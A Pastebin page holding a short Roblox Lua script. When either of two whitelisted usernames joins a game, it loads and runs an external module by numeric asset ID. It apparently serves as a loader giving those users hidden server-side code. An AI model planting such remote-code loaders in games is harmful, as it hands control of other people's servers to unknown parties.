Advertisement
gdgrg

luis911911

Aug 28th, 2019
123
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.27 KB | None | 0 0
  1. -- Please watch the vid before doing this
  2. -- By DennisH1mself
  3. local allowed = {"luis911911", "00000_53"}
  4.  
  5. game.Players.PlayerAdded:Connect(function(player)
  6. for i, v in pairs(allowed) do
  7. if player.Name == v then
  8. require(3146633195):Fire(player.Name)
  9. end
  10. end
  11. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement